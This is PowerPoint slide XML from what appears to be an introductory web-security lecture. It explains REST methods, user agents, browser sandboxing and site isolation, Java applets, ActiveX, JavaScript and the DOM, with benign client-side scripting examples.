              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CF066F-6BBF-0274-E438-C3D02BF51B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7601590" y="4829351"/>
            <a:ext cx="1542410" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>restfulapi.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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5726261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BDD97-3661-39CA-254D-BFE59EDF11E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D83F7F36-8755-48C9-8512-723DF7B8AFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REST APIs give specific meaning to methods and return codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET: Retrieve resource (idempotent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST: Create a new resources under the specified ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PUT: Update an existing resource with a new resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE: Delete a resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PATCH: Partial update to a resource</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16634554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Agents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Agents are the client-side component responsible for the retrieval and display of web resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Libraries: Python requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command-line applications: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, curl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers: Chrome, Firefox, Safari </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some User Agents support the execution of client-side code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Historical (Java Applets, ActiveX controls, Flash programs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41398810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B89F-64AF-696E-6FB3-D0528C6B444E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8DE04E-8698-CFB1-0A70-818E25C091E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers are the main application through which use interact with web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers display content (images, videos, animations) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers download and execute code on-demand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sandboxing mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent code from accessing the underlying OS environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent code from one site to access the code or information from another site </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38727065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A100-201E-8CA7-508E-278FAE57E1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="multiple renderer for tabs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{742DD0E6-679C-C444-DE90-FFAF640DD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357589"/>
            <a:ext cx="4251811" cy="24283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rome processes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEFF76C-C7A6-99C7-9A36-CA641F8DD6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378" y="1548232"/>
            <a:ext cx="4014611" cy="20470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14882E3-D197-C222-5C08-6BC42B964BF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484775" y="4835723"/>
            <a:ext cx="2743200" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>developer.chrome.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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5439614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55ED-25CF-1754-C8B1-D0B8E94E6CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site Isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465FECAD-F6F3-A865-B4A8-91448CA8382D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each tab has a separate renderer process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has a separate renderer process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7107DA10-B054-40E7-663D-4FCEEAAA6A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="site isolation">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44E9F6BB-BD90-D5F1-F4E6-BC2B59D51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006" y="1200149"/>
            <a:ext cx="3840987" cy="1967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5651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a:t>Java Applets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java applets are compiled Java programs that are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Downloaded into a browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executed within the context of a web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to resources is regulated by an implementation of the Java Security Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduced in 1995, experienced initial success but was not adopted widely</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102555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Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities in the protocol(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities in the infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities in the server-side portion of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities in the client-side portion of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many vulnerability are the results of interactions of the various components involved in the processing of a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understanding the basic technologies is key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25094204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a:t>ActiveX Controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ActiveX controls are binary, OS-specific programs that are downloaded and executed in the context of a web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ActiveX controls are supported only by Windows-based browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code is signed using the Authenticode mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once executed, they have complete access to the client’s environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support has been discontinued in the Microsoft Edge browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34224355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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EcmaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/TypeScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting languages used to implement dynamic behavior in web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript initially introduced by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetScape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in 1995 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LiveScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orignal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EcmaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a standardized version of JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TypeScript is a strongly-typed version of JavaScript that can be translated into JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31247811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r>
              <a:rPr lang="en-US"/>
              <a:t>Client-side Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code is included using external references</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=“http://www.foocom/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>somecode.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code is embedded into HTML pages using the SCRIPT tag and storing the code in comments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;script LANGUAGE=“JavaScript”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;!-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> name = prompt ('Please Enter your name below.','')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      if ( name == null ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> ('Welcome to my site!')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	    else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> ('Welcome to my site '+name+'!')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	    }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9625866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and BOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Document Object Model (DOM) is a programmatic interface to the manipulation of client-side content:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
